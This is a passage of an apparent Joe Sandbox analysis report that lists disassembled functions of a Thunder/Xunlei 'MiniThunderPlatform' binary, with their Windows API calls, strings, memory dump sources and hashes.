                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EB95
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBA7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBB9
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$V01@@$H_prolog$?append@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: .td.cfg$cfg_suffix$temp_file
                                                                                                                                              • API String ID: 2327089072-1355609058
                                                                                                                                              • Opcode ID: 0cd4b5780d56d1d2a1a24418b979c958b7974a20e59e2a31d991a555d8df9a9c
                                                                                                                                              • Instruction ID: 1ad507df1bc475fcabe229ac2c60b1e3ea226ba5c962a60a4d8efec41bb8c724
                                                                                                                                              • Opcode Fuzzy Hash: 0cd4b5780d56d1d2a1a24418b979c958b7974a20e59e2a31d991a555d8df9a9c
                                                                                                                                              • Instruction Fuzzy Hash: D931F675008391DFD324CB64C888B9ABBE4FBA9754F048A4DF59A82291DB756109CF63
                                                                                                                                              Function 004369F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00436A4A
                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 00436A5D
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00436A7E
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436AD6
                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00436AF3
                                                                                                                                              • ??$?8_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@PB_W@Z.MSVCP71(?,ShenZhen Thunder Networking Technologies Ltd.), ref: 00436B2C
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436B5C
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436B8A
                                                                                                                                              Strings
                                                                                                                                              • ShenZhen Thunder Networking Technologies Ltd., xrefs: 00436B20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@std@@$FileW@2@@std@@$??1?$basic_string@_ExistsPath$??$?8_??0?$basic_string@_ModuleNameV?$basic_string@_W@1@@std@@W@2@@0@lstrcpy
                                                                                                                                              • String ID: ShenZhen Thunder Networking Technologies Ltd.
                                                                                                                                              • API String ID: 4027134674-823679711
                                                                                                                                              • Opcode ID: bffe227b7a8a68c5a4edfbaf2b8ae713173dcab9446071bc61f1e109dbbcbbec
                                                                                                                                              • Instruction ID: ca37a992bef3b65b0a3a5e7db0634d793f7c78e51c49cbd5fe67474e0670b129
                                                                                                                                              • Opcode Fuzzy Hash: bffe227b7a8a68c5a4edfbaf2b8ae713173dcab9446071bc61f1e109dbbcbbec
                                                                                                                                              • Instruction Fuzzy Hash: 3A41C77280062C9BCB60EB55DC86BDDB778AF04354F02029AE909A7191DF395FC8CBD9
                                                                                                                                              Function 100516D0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 118networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSASendTo.WS2_32(?,?,00000001,?,00000000,?,00000010,?,Function_00035BD0), ref: 100517EB
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100517F7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn write request error), ref: 10051816
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10051839
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionH_prologLastSendThrowV01@@
                                                                                                                                              • String ID: .\asyn_udp_device.cpp$asyn write request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3461854569-1737582519
                                                                                                                                              • Opcode ID: 6ac6d84292adf02e26f3c9298f059792bcb23d75340b1c5e8e882a2fe6e710ad
                                                                                                                                              • Instruction ID: 37cd3e4c93ddf684bcf3db9c83c6192928767c09cc929a34241b9480232ee033
                                                                                                                                              • Opcode Fuzzy Hash: 6ac6d84292adf02e26f3c9298f059792bcb23d75340b1c5e8e882a2fe6e710ad
                                                                                                                                              • Instruction Fuzzy Hash: 09415976504740AFC320CF69C880B9BB7E9FB99614F508A1DF19A87641EB71A849CB61
                                                                                                                                              Function 10026CF0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 58fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 10026D2F
                                                                                                                                              • GetLastError.KERNEL32 ref: 10026D39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10026D74
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(write file error), ref: 10026D4A
                                                                                                                                                • Part of subcall function 1002BC50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1002BC96
                                                                                                                                                • Part of subcall function 1002BC50: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ), ref: 1002BCA9
                                                                                                                                                • Part of subcall function 1002BC50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002BCC8
                                                                                                                                                • Part of subcall function 1002BC50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002BCD6
                                                                                                                                              • GetLastError.KERNEL32(?,102B5DEC), ref: 10026D7F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(while write file,only part data write success), ref: 10026D90
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10026DC0
                                                                                                                                              Strings
                                                                                                                                              • while write file,only part data write success, xrefs: 10026D85
                                                                                                                                              • write file error, xrefs: 10026D3F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??1?$basic_string@?append@?$basic_string@FileV01@V01@@V12@V12@@WriteY?$basic_string@
                                                                                                                                              • String ID: while write file,only part data write success$write file error
                                                                                                                                              • API String ID: 3724975500-2030508876
                                                                                                                                              • Opcode ID: 8ae462823b99c97d56f5d47b551aaa92d34345c773b9bf382df08cdfd043a8fe
                                                                                                                                              • Instruction ID: dfebf0c40c054dc2fc9c4f37bad48138f3b691c14cbe0165f517583fbe872d7a
                                                                                                                                              • Opcode Fuzzy Hash: 8ae462823b99c97d56f5d47b551aaa92d34345c773b9bf382df08cdfd043a8fe
                                                                                                                                              • Instruction Fuzzy Hash: C2216D76504350ABC320DB90DC48FDFB7A8FB99750F408A0DF59EA3150DB34A548CBA2
                                                                                                                                              Function 00423210 Relevance: 15.1, APIs: 10, Instructions: 140synchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,0044FBB0), ref: 0042327D
                                                                                                                                              • SetEvent.KERNEL32(?), ref: 004232B0
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004232BF
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00423319
                                                                                                                                              • OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 00423330
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 0042334F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423368
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_CountEventMutexObjectOpenSingleTickWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3267940041-0
                                                                                                                                              • Opcode ID: 8f4e68ccf4d49224507931db2878c4df31ec8a749211f7ca2c11925ec124e36c
                                                                                                                                              • Instruction ID: 66af2f706a4fc54bf32e32d169818bf9685eb6962bec8b6ff057aab517050a6c
                                                                                                                                              • Opcode Fuzzy Hash: 8f4e68ccf4d49224507931db2878c4df31ec8a749211f7ca2c11925ec124e36c
                                                                                                                                              • Instruction Fuzzy Hash: 8D51E371D00618CFCB60EFA9D886BDDBB75EB04319F51026EE80567291CB3C5E88CB99
                                                                                                                                              Function 100120D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100120DE
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,7C3869BF), ref: 1001212D
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 10012141
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,?,?,?,?,?), ref: 10012187
                                                                                                                                              • sprintf.MSVCR71(?,Version_%d_%d_%d_%d\,?,?,?,?,?,00000000,00000208,?,?,?,?,?), ref: 100121CE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100121E4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10012235
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@ModuleU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@FileH_prologHandleNamememsetsprintf
                                                                                                                                              • String ID: Version_%d_%d_%d_%d\
                                                                                                                                              • API String ID: 1742427401-4290856180
                                                                                                                                              • Opcode ID: ff6f02d88dab7eed332665cdc66f430ea3c5e04ff1beef19c9723b760c12fd58
                                                                                                                                              • Instruction ID: 49383a59ca82b459dfc8258b021347c13c199b0895a2491320e2b5c96c3698fd
                                                                                                                                              • Opcode Fuzzy Hash: ff6f02d88dab7eed332665cdc66f430ea3c5e04ff1beef19c9723b760c12fd58
                                                                                                                                              • Instruction Fuzzy Hash: 73410D72900128ABCB65DBA4DC85ADEB7BCEF08711F4045E6F609E6150EA34AB85CF61
                                                                                                                                              Function 00431910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 0043194C
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpstart_up_e_20130515_360), ref: 00431976
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00431999
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004319AB
                                                                                                                                              • OpenEventW.KERNEL32(001F0003,00000000,00000000), ref: 004319C2
                                                                                                                                              • GetLastError.KERNEL32 ref: 004319D4
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00431A0B
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpstart_up_e_20130515_360, xrefs: 0043196E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_ErrorEventLastOpenV01@@
                                                                                                                                              • String ID: _mini_tpstart_up_e_20130515_360
                                                                                                                                              • API String ID: 2803960666-1174414084
                                                                                                                                              • Opcode ID: 4edafbe2f400f188d6f250a5d6ed9f747c46fe2c57888393f6b5a7c92bcf825c
                                                                                                                                              • Instruction ID: 4c9d6f9e1c92e4dceb87760027141c09580d6feaa697c545d84014bd4d3c8832
                                                                                                                                              • Opcode Fuzzy Hash: 4edafbe2f400f188d6f250a5d6ed9f747c46fe2c57888393f6b5a7c92bcf825c
                                                                                                                                              • Instruction Fuzzy Hash: 3231F8B2D006189FCB50FB69E8867DCBB74EB08314F41022AF919A3281DB395D88C7D9
                                                                                                                                              Function 10026A90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(00000002,C0000000,00000001,00000000,00000003,00000080,00000000,102FE990,?,00000000), ref: 10026B17
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 10026B25
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(open file:,?,00000000), ref: 10026B36
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10026B4C
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71( error ), ref: 10026B5B
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 10026B7A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?append@?$basic_string@CreateErrorExceptionFileLastThrowV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: error $open file:
                                                                                                                                              • API String ID: 708047030-1055500812
                                                                                                                                              • Opcode ID: a01ec0cfd312dd1d180eee41c57829b08634a2dbc5cf902ed410d6bcbcb224c5
                                                                                                                                              • Instruction ID: af0c699b5bf6f22d0026a73b9441059ffbf3242724adcb5d6d3bd9bb015f3abb
                                                                                                                                              • Opcode Fuzzy Hash: a01ec0cfd312dd1d180eee41c57829b08634a2dbc5cf902ed410d6bcbcb224c5
                                                                                                                                              • Instruction Fuzzy Hash: D021AD72204240DBD325CB54DC89B9BB7E8FB98750FA08A2DF556C76A0DB71E884CB52
                                                                                                                                              Function 0042E8AB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0042E8EE
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(00448C70), ref: 0042E8FF
                                                                                                                                              • lstrcatW.KERNEL32(?,Xunlei), ref: 0042E917
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0042E91D
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042E92E
                                                                                                                                              • lstrcatW.KERNEL32(?,00448CD4), ref: 0042E93D
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(?), ref: 0042E945
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@lstrcat$AttributesCreateDirectoryFilePathTemp
                                                                                                                                              • String ID: Xunlei
                                                                                                                                              • API String ID: 4113646224-3606950124
                                                                                                                                              • Opcode ID: 275c6e406dde1af2e05b76bb3da948214c0c0e7f6502a196191f1fa141221dfa
                                                                                                                                              • Instruction ID: 23372d962daa25e0a62ebe29e56fac1dad01d2b3c3cd33e29acebd24969eaef7
                                                                                                                                              • Opcode Fuzzy Hash: 275c6e406dde1af2e05b76bb3da948214c0c0e7f6502a196191f1fa141221dfa
                                                                                                                                              • Instruction Fuzzy Hash: 8D113372A1070CABEB70DFB4EC84ADDB7BCAB58315F10443AE521E3192DB7595488F64
                                                                                                                                              Function 10010F07 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10010E98: memset.MSVCR71(?,00000000,00000094,00000000,?), ref: 10010EBB
                                                                                                                                                • Part of subcall function 10010E98: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 10010ED0
                                                                                                                                                • Part of subcall function 10010E98: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 10010EDD
                                                                                                                                              • LoadLibraryW.KERNEL32(shell32.dll,?,?,10010FE1,?,?,?,10011901,?,10012105), ref: 10010F19
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 10010F29
                                                                                                                                              • wcslen.MSVCR71(00000000,?,?,10010FE1,?,?), ref: 10010F4D
                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 10010F5C
                                                                                                                                              • wcscpy.MSVCR71(?,00000000,?,10010FE1,?,?), ref: 10010F69
                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 10010F74
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
